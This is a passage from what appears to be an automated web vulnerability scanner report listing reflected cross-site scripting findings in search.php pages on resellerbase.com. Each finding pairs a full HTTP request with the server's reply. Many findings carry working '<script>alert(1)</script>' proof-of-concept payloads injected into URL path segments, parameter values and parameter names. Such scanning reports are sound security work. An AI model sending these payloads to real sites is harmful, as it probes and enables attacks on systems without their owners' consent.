This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search2ce9a<a>7d0f221622e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search2ce9a<a>7d0f221622e&opt=2 was not found on this server.</p>
...[SNIP]...

2.546. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eec90<a>b63d7dd58ce was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...eec90<a>b63d7dd58ce&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...eec90<a>b63d7dd58ce&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.547. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 56852<script>alert(1)</script>b477afa29a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&56852<script>alert(1)</script>b477afa29a5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&56852<script>alert(1)</script>b477afa29a5=1 was not found on this server.</p>
...[SNIP]...

2.548. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3912d<a>b77d1f358fb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23912d<a>b77d1f358fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23912d<a>b77d1f358fb was not found on this server.</p>
...[SNIP]...

2.549. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cbe8c<script>alert(1)</script>8ae41186207 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationcbe8c<script>alert(1)</script>8ae41186207/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationcbe8c<script>alert(1)</script>8ae41186207/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.550. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ebdf<script>alert(1)</script>4ce37b0c168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband3ebdf<script>alert(1)</script>4ce37b0c168/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband3ebdf<script>alert(1)</script>4ce37b0c168/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.551. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f7ee<script>alert(1)</script>6d506e0b1fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes1f7ee<script>alert(1)</script>6d506e0b1fa/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes1f7ee<script>alert(1)</script>6d506e0b1fa/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.552. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35089<script>alert(1)</script>2dd7a9e14f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos35089<script>alert(1)</script>2dd7a9e14f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos35089<script>alert(1)</script>2dd7a9e14f/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.553. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ccc5b<script>alert(1)</script>b6a5986c3ae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesccc5b<script>alert(1)</script>b6a5986c3ae/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesccc5b<script>alert(1)</script>b6a5986c3ae/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.554. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e25fa<script>alert(1)</script>043c6692ac2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/search.phpe25fa<script>alert(1)</script>043c6692ac2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.phpe25fa<script>alert(1)</script>043c6692ac2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.555. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4edbb<a>a66039a92b1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4edbb<a>a66039a92b1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4edbb<a>a66039a92b1&opt=2 was not found on this server.</p>
...[SNIP]...

2.556. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 91263<a>d45704d6846 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...91263<a>d45704d6846&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...91263<a>d45704d6846&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.557. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0508<script>alert(1)</script>a9fb5d52a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d0508<script>alert(1)</script>a9fb5d52a16=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d0508<script>alert(1)</script>a9fb5d52a16=1 was not found on this server.</p>
...[SNIP]...

2.558. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5f5b4<a>f02b6a2883c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=25f5b4<a>f02b6a2883c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=25f5b4<a>f02b6a2883c was not found on this server.</p>
...[SNIP]...

2.559. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af2e7<script>alert(1)</script>60da122253e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationaf2e7<script>alert(1)</script>60da122253e/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationaf2e7<script>alert(1)</script>60da122253e/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.560. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdb5e<script>alert(1)</script>69e80c57a94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandfdb5e<script>alert(1)</script>69e80c57a94/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandfdb5e<script>alert(1)</script>69e80c57a94/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.561. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f2c0<script>alert(1)</script>5ae70f00916 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes5f2c0<script>alert(1)</script>5ae70f00916/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes5f2c0<script>alert(1)</script>5ae70f00916/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.562. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e22e<script>alert(1)</script>2c24ddad42f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos5e22e<script>alert(1)</script>2c24ddad42f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
